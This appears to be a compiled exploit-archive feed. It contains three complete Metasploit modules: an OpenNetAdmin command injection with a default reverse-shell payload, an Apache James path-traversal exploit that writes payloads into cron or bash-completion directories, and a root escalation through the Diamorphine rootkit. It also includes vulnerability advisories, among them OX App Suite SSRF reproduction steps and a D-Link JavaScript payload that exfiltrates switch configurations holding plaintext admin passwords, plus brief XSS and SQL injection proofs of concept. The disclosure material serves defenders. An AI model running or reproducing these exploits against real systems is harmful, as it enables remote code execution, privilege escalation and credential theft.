This Metasploit module exploits a command injection in OpenNetAdmin between versions 8.5.14 and 18.1.1.

MD5 | dd68182ff324bc4eb08a80906181e31c

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenNetAdmin Ping Command Injection',
'Description' => %q{
This module exploits a command injection in OpenNetAdmin between 8.5.14 and 18.1.1.
},
'Author' =>
[
'mattpascoe', # Vulnerability discovery and exploit
'Onur ER ' # Metasploit module
],
'References' =>
[
['EDB', '47691']
],
'DisclosureDate' => '2019-11-19',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' =>
[
['Automatic Target', {}]
],
'DefaultOptions' =>
{
'RPORT' => 80,
'payload' => 'linux/x86/meterpreter/reverse_tcp'
},
'DefaultTarget' => 0))

register_options(
[
OptString.new('VHOST', [false, 'HTTP server virtual host']),
OptString.new('TARGETURI', [true, 'Base path', '/ona/login.php'])
]
)
deregister_options('CMDSTAGER::FLAVOR')
end

def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'vars_post' => {
'xajax' => 'window_open',
'xajaxargs[]' => 'app_about'
}
})

unless res
return CheckCode::Unknown 'Connection failed'
end

unless res.body =~ /OpenNetAdmin/i
return CheckCode::Safe
end

opennetadmin_version = res.body.scan(/OpenNetAdmin - v([d.]+)/).flatten.first
version = Gem::Version.new(opennetadmin_version)

if version
vprint_status "OpenNetAdmin version #{version}"
end

if version.between?(Gem::Version.new('8.5.14'), Gem::Version.new('18.1.1'))
return CheckCode::Appears
end

CheckCode::Detected
end

def exploit
print_status('Exploiting...')
execute_cmdstager(flavor: :printf)
end

def execute_command(cmd, opts = {})
begin
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'vars_post' => {
'xajax' => 'window_submit',
'xajaxargs[]' => ['tooltips', "ip=>;#{CGI.escape(cmd)};", 'ping']
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

Source

Open-Xchange App Suite and Documents versions 7.10.2 and below suffer from multiple server-side request forgery vulnerabilities.

MD5 | 43acfce60891d606ddbc7bb9726ef5ad

Product: OX App Suite / OX Documents
Vendor: OX Software GmbH

Internal reference: 67871, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Vulnerability Details:
The attachment API for Calendar, Tasks etc. allows to define references to E-Mail attachments that should be added. This reference was not checked against a sufficient protocol and host blacklist.

Risk:
Users can trigger API calls that invoke local files or URLs. Content provided by these resources would be added as attachment.

Steps to reproduce:
1. Create a task
2. Use the /ajax/attachment?action=attach API call and provide a URL
"datasource": {
"identifier": "com.openexchange.url.mail.attachment",
"url": "file:///var/file"
}

Solution:
We have implemented a protocol and host blacklist to avoid invoking any file-system references and local addresses.



---



Internal reference: 67874 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-10-31
Solution date: 2019-12-09
Public disclosure: 2020-02-19
Researcher Credits: chbi
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The RSS feature allows to add arbitrary data sources. To avoid exposing confidential data we implemented a host blacklist and protocol whitelist. Due to an error the host blacklist was not checked in case the protocol passed the whitelist.

Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services.

Steps to reproduce:
1. Create a RSS feed
2. Use http://127.0.0.1.nip.io:80/test.xml as RSS feed
3. Monitor the response code

Solution:
We fixed the blacklist evaluation and avoid access to blacklisted hosts regardless of the port evaluation. Please consider adjusting com.openexchange.messaging.rss.feed.blacklist to you network layout.



---



Internal reference: 67931, 68258 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-04
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The snippets API allows to add arbitrary data sources. This reference was not checked against a sufficient protocol and host blacklist.

Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology, services and files.

Steps to reproduce:
1. Create a snippet with HTML content
2. Include a reference to an internal host/service

3. Monitor the response code

Solution:
We implemented a protocol and host blacklist to avoid invoking any file-system references and local addresses.



---



Internal reference: 67980 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: backend
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.6.3-rev49, 7.8.4-rev66, 7.10.1-rev25, 7.10.2-rev19
Vendor notification: 2019-11-05
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
The mail accounts feature allows to add arbitrary data sources. To avoid exposing confidential data we implemented a host blacklist and protocol whitelist. Due to an error the host blacklist was not checked in case the protocol passed the whitelist.

Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services.

Steps to reproduce:
1. Create a mail account
2. Use 127.0.0.1:143 as IMAP server
3. Monitor the network socket

Solution:
We fixed the blacklist evaluation and avoid access to blacklisted hosts regardless of the port evaluation. Please consider adjusting com.openexchange.mail.account.blacklist to you network layout.



---



Internal reference: 67983 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2
Vulnerable component: office
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.10.2-rev4
Vendor notification: 2019-11-05
Solution date: 2019-12-09
Public disclosure: 2020-02-19
Researcher Credits: chbi
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
Recent versions of OX Documents allow to invoke images from URL sources. Since no sufficient blacklist was in place, this allows to make the server-side request arbitrary image resources.

Risk:
Users can trigger API calls that invoke local URLs, if a host can be accessed a different error will be returned compared to unavailable hosts. This can be used to discover an internal network topology and services.

Steps to reproduce:
1. Create a OX Documents document
2. Insert an image from URL and specify a local address, like http://127.0.0.1/test.jpg
3. Monitor the response code

Solution:
We implemented a host blacklist to avoid invoking any local addresses and operator-defined network blocks. Please consider adjusting com.openexchange.office.upload.blacklist to you network layout.



---



Internal reference: 68252 (Bug ID)
Vulnerability type: Server-Side Request Forgery (CWE-918)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: readerengine
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev10, 7.10.1-rev5, 7.10.2-rev6
Vendor notification: 2019-11-15
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-18846
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Vulnerability Details:
Documentconverter can be used to convert "remote" URLs to return images. The source for those URLs was not checked against a blacklist.

Risk:
Local resources like images or websites could be invoked by end-users and expose their content through the generated image.

Steps to reproduce:
1. Create a document and use a image "from URL"
2. Enter a URL that redirects to the local documentconverter instance which again contains a reference to a local resource
http%3A//localhost%3A8008/documentconverterws%3Faction%3Dconvert%26url%3Dhttp%253A//localhost/%26targetformat%3Dpng

Solution:
We now reject redirects and check provided URLs against blacklists and protocol whitelists.



---



Internal reference: 68136 (Bug ID)
Vulnerability type: Missing escaping (CWE-116)
Vulnerable version: 7.10.2 and earlier
Vulnerable component: readerengine
Report confidence: Confirmed
Solution status: Fixed by Vendor
Fixed version: 7.8.4-rev6, 7.10.1-rev4, 7.10.2-rev3
Vendor notification: 2019-11-11
Solution date: 2019-12-09
Public disclosure: 2020-02-19
CVE reference: CVE-2019-9853 (LibreOffice)
CVSS: 7.8 (CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

Vulnerability Details:
We have backported recent updates of LibreOffice, which is being used by readerengine. This fixes a potential vulnerabilities which are not directly related to readerengine.

Risk:
Existing vulnerabilities at upstream projects could be used in context of OX App Suite / OX Documents. This is an update based on precaution.

Steps to reproduce:
1. n/a

Solution:
n/a

Source

D-Link DGS-1250 suffers from a header injection vulnerability that can be leveraged through cross site scripting.

MD5 | 56529bffd14f3b239cc24f418e85ace4

D-Link DGS-1250 header injection vulnerability
==============================================
The latest version of this advisory is available at:
https://sintonen.fi/advisories/d-link-dgs-1250-header-injection.txt


Overview
--------

D-Link DGS-1250 switch is susceptible to a header injection vulnerability enabling
attacker to steal the switch configuration.


Description
-----------

D-Link DGS-1250 switch web user interface fails to sanitize certain form parameters
for malicious input. The attacker is able to inject arbitrary headers to the HTTP
response, bypassing browser Cross-Origin protection.


Impact
------

Malicious external JavaScript can exfiltrate the D-Link DGS-1250 switch configuration.
The configuration includes admin credentials with plain text passwords among other
confidential information.


Details
-------

The discovered vulnerability, described in more detail below, enables the attack
described here in brief.

1. The attacker creates a malicious JavaScript payload. The payload will have code
to exploit the vulnerability to exfiltrate the switch configuration (*):

var xhr = new XMLHttpRequest();
xhr.open("POST", location.protocol + "//10.90.90.90/BinFile/config.cfg", false);
xhr.withCredentials = true;
xhr.send("hidunit_id=1&hidfile_type=2&hidoption_type=0&hidsrc_file=Config1&" +
"hidfile_name=config.txt%0a" +
"Access-Control-Allow-Credentials: true%0a" +
"Access-Control-Allow-Origin: " + window.location.origin);
if (xhr.status === 200) {
// send xhr.responseText to the attacker
}

2. The attacker adds the JavaScript payload to web site(s) and lures the logged in
administrator to visit the site, either by mass spamming or by targeted
phishing.

3. As soon as the logged in administrator visits the malicious site with the
JavaScript payload, the full switch configuration is sent to the attacker.


*) The example payload uses a fixed default IP address. Real world attack could be
smarter in this regard: it could attempt to determine the client's internal IP
address by leveraging WebRTC. Once the client IP address is identified the attack
would attempt to fetch an image URL from the web user interface. Successful image
loading would indicate that the switch is found.


Vulnerabilities
---------------

1. CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers

`/BinFile/config.cfg' fails to neutralize CRLF sequences in `hidfile_name' parameter.
Thus it is possible to include additional headers to the HTTP response, such as CORS
(Cross-Origin Resource Sharing) headers "Access-Control-Allow-Credentials" and
"Access-Control-Allow-Origin". Successful injection enables a third-party web site
to receive the POST response (config file).


Proof-of-Concept
----------------

For devices without SSL configured:
http://sintonen.fi/advisories/d-link-dgs-1250-header-injection-poc.html

For devices with SSL configured:
https://sintonen.fi/advisories/d-link-dgs-1250-header-injection-poc.html

The PoC expects the switch to use the default IP address 10.90.90.90.


Vulnerable versions
-------------------

The following D-Link DGS-1250 firmware versions are known to be vulnerable:
- Build 1.00.040
- Build 2.01.006

Older versions are likely vulnerable as well, but were not tested. Other D-Link
models could be affected as well.


Impact of the SameSite cookie attribute
---------------------------------------

Browsers that implement SafeSite cookie attribute and default it to "Lax" mode
will automatically mitigate this vulnerability. At least Chrome and Firefox are
likely to switch to defaulting to Lax mode sometime in 2020.


Vendor recommendations
----------------------

1. Sanitize input that ends up in the HTTP response headers. In particular do not
allow linefeed characters (ASCII characters 10 and 13) as-is.


End user mitigation
-------------------

1. Use a dedicated browser session to access the web user interface.


Credits
-------

The vulnerability was discovered by Harry Sintonen / F-Secure Consulting.


Timeline
--------

2019.12.18 initial discovery of the vulnerability
2019.12.18 reported the vulnerability to D-Link via Report Vulnerabilities form
2019.12.19 received vendor acknowledgement
2020.01.08 requested status update from the vendor contact
2020.01.10 added section about impact of the SameSite cookie attribute
2020.02.11 sent a reminder to the vendor contact of the default 60 day dislosure
policy
2020.02.19 public disclosure


Source

Online Birth Certificate System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | d74f46d5ff00bd79b6623218f49f35b1

# Exploit Title: Online Birth Certificate System 1.0 Stored Cross-Site Scripting Vulnerability
# Date: 2020-02-21
# Exploit Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and- mysql/
# Software: : Online Birth Certificate System # Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10
# This application is vulnerable to Stored XSS vulnerability. This


# Vulnerable script: http://localhost/obcs/user/fill-birthregform.php
# Vulnerable parameters: ‘Place of Birth’, ‘Full Name of Father’, ‘Permanent Address’, ‘Postal Address’
# Payload used: alert(‘document.cookie’)
# POC: When you view the details under the Manage Details tab
# You will see your Javascript code executes.


Thanks and Regards, Priyanka Samak

Source

AMSS++ version 4.31 suffers from a remote SQL injection vulnerability.

MD5 | 7a2f4c394576c72f47569db0d159cb4f

====================================================================================================================================
| # Title : AMSS++ v 4.31 Sql Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) |
| # Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar |
| # Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++" |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /modules/mail/main/maildetail.php?id=174

[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here


Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

Source

This Metasploit module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory. To use this module with the cron exploitation method, run the exploit using the given payload, host, and port. After running the exploit, the payload will be executed within 60 seconds. Due to differences in how cron may run in certain Linux operating systems such as Ubuntu, it may be preferable to set the target to Bash Completion as the cron method may not work. If the target is set to Bash completion, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. For this exploitation method, bash completion must be enabled to gain code execution. This exploitation method will leave an Apache James mail object artifact in the /etc/bash_completion.d directory and the malicious user account.

MD5 | 3d2e5a1c98fb29c02aab67ae9f098b24

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager

def initialize(info={})
super(update_info(info,
'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
'Description' => %q{
This module exploits a vulnerability that exists due to a lack of input
validation when creating a user. Messages for a given user are stored
in a directory partially defined by the username. By creating a user
with a directory traversal payload as the username, commands can be
written to a given directory. To use this module with the cron
exploitation method, run the exploit using the given payload, host, and
port. After running the exploit, the payload will be executed within 60
seconds. Due to differences in how cron may run in certain Linux
operating systems such as Ubuntu, it may be preferable to set the
target to Bash Completion as the cron method may not work. If the target
is set to Bash completion, start a listener using the given payload,
host, and port before running the exploit. After running the exploit,
the payload will be executed when a user logs into the system. For this
exploitation method, bash completion must be enabled to gain code
execution. This exploitation method will leave an Apache James mail
object artifact in the /etc/bash_completion.d directory and the
malicious user account.
},
'License' => MSF_LICENSE,
'Author' => [
'Palaczynski Jakub', # Discovery
'Matthew Aberegg', # Metasploit
'Michael Burkey' # Metasploit
],
'References' =>
[
[ 'CVE', '2015-7611' ],
[ 'EDB', '35513' ],
[ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
],
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[ 'Bash Completion', {
'ExploitPath' => 'bash_completion.d',
'ExploitPrepend' => '',
'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
} ],
[ 'Cron', {
'ExploitPath' => 'cron.d',
'ExploitPrepend' => '* * * * * root ',
'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
} ]
],
'Privileged' => true,
'DisclosureDate' => "Oct 1 2015",
'DefaultTarget' => 1,
'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
))
register_options(
[
OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),
Opt::RPORT(25)
])
import_target_defaults
end

def check
# SMTP service check
connect
smtp_banner = sock.get_once
disconnect
unless smtp_banner.to_s.include? "JAMES SMTP Server"
return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
end

# James Remote Administration Tool service check
connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
admin_banner = sock.get_once
disconnect
unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
end

# Get version number
version = admin_banner.scan(/JAMES Remote Administration Tool ([d.]+)/).flatten.first
# Null check
unless version
return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
end
# Create version objects
target_version = Gem::Version.new(version)
vulnerable_version = Gem::Version.new("2.3.2")

# Check version number
if target_version > vulnerable_version
return CheckCode::Safe
elsif target_version == vulnerable_version
return CheckCode::Appears
elsif target_version < vulnerable_version
return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
end
end

def execute_james_admin_tool_command(cmd)
username = datastore['USERNAME']
password = datastore['PASSWORD']
connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
sock.get_once
sock.puts(username + "n")
sock.get_once
sock.puts(password + "n")
sock.get_once
sock.puts(cmd)
sock.get_once
sock.puts("quitn")
disconnect
end

def cleanup
return unless target['ExploitPath'] == "cron.d"
# Delete mail objects containing payload from cron.d
username = "../../../../../../../../etc/cron.d"
password = @account_password
begin
connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
sock.get_once
sock.puts("USER #{username}rn")
sock.get_once
sock.puts("PASS #{password}rn")
sock.get_once
sock.puts("dele 1rn")
sock.get_once
sock.puts("quitrn")
disconnect
rescue
print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")
end

# Delete malicious user
delete_user_command = "deluser ../../../../../../../../etc/cron.dn"
execute_james_admin_tool_command(delete_user_command)
end

def execute_command(cmd, opts = {})
# Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
exploit_path = target['ExploitPath']
@account_password = Rex::Text.rand_text_alpha(8..12)
add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}n"
execute_james_admin_tool_command(add_user_command)

# Send payload via SMTP
payload_prepend = target['ExploitPrepend']
connect
sock.puts("ehlo admin@apache.comrn")
sock.get_once
sock.puts("mail from: rn")
sock.get_once
sock.puts("rcpt to: rn")
sock.get_once
sock.puts("datarn")
sock.get_once
sock.puts("From: admin@apache.comrn")
sock.puts("rn")
sock.puts("'n")
sock.puts("#{payload_prepend}#{cmd}n")
sock.puts("rn.rn")
sock.get_once
sock.puts("quitrn")
sock.get_once
disconnect
end

def execute_cmdstager_end(opts)
if target['ExploitPath'] == "cron.d"
print_status("Waiting for cron to execute payload...")
else
print_status("Payload will be triggered when someone logs onto the target")
print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
end
end

def exploit
execute_cmdstager(background: true)
end

end

Source

This Metasploit module uses Diamorphine rootkit's privesc feature using signal 64 to elevate the privileges of arbitrary processes to UID 0 (root). This module has been tested successfully with Diamorphine from master branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).

MD5 | 0f5d26726fb0bdde38edd5ddbc676005

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'Diamorphine Rootkit Signal Privilege Escalation',
'Description' => %q{
This module uses Diamorphine rootkit's privesc feature using signal
64 to elevate the privileges of arbitrary processes to UID 0 (root).

This module has been tested successfully with Diamorphine from `master`
branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'm0nad', # Diamorphine
'bcoles' # Metasploit
],
'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
'References' =>
[
['URL', 'https://github.com/m0nad/Diamorphine']
],
'Platform' => ['linux'],
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0))
register_options [
OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end

def signal
datastore['SIGNAL'].to_s
end

def base_dir
datastore['WritableDir'].to_s
end

def upload_and_chmodx(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
chmod path, 0755
end

def cmd_exec_elevated(cmd)
vprint_status "Executing #{cmd} ..."
res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
vprint_line res unless res.blank?
res
end

def check
res = cmd_exec_elevated 'id'

if res.include?('invalid signal')
return CheckCode::Safe("Signal '#{signal}' is invalid")
end

unless res.include?('uid=0')
return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
end

CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
end

def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end

if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end

unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end

payload_name = ".#{rand_text_alphanumeric 8..12}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
register_file_for_cleanup payload_path

cmd_exec_elevated "#{payload_path} & echo "
end
end

Source

WordPress Yikes Inc Easy Mailchimp Extender plugin version 6.6.2 suffers from a cross site scripting vulnerability.

MD5 | c423a749c8f7efb16888e9b98084bd3a

[-] Title  : word press plugin yikes-inc-easy-mailchimp-extender 6.6.2 -
Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor :
https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
==============================================================================================
Vulnerable Source:
2: $form_data['field_name'] = $_POST['field_name']
36: echo echo $form_data['field_name'];
50: echo echo $form_data['field_type'];
===============================================================================================
POC :
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

Step 2 = In the box : "field_name" AND "field_type"

Step 3 = input box , Add JavaScript Code : alert('XSS')
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source

WordPress WPForms-Lite plugin version 1.5.8.2 suffers from a cross site scripting vulnerability.

MD5 | 944ecdb044dbe08019b3254c5ca78a02

[-] Title : word press plugin wpforms-lite 1.5.8.2 - Cross-Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Software Link : https://wordpress.org/plugins/wpforms-lite/
[-] Version: [ 1.5.8.2 ]
[-] Tested on : Windows
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable page :
wpforms-lite/includes/providers/class-base.php
===============================================================================================
Vulnerable Source :
1071 : echo echo absint($_GET['form_id']);
================================================================================================
POC :
http://localhost/wp-content/plugins/wpforms-lite/includes/providers/class-base.php?form_id=[XSS]
================================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : mehranfeizi13841384@gmail.com
************************

Source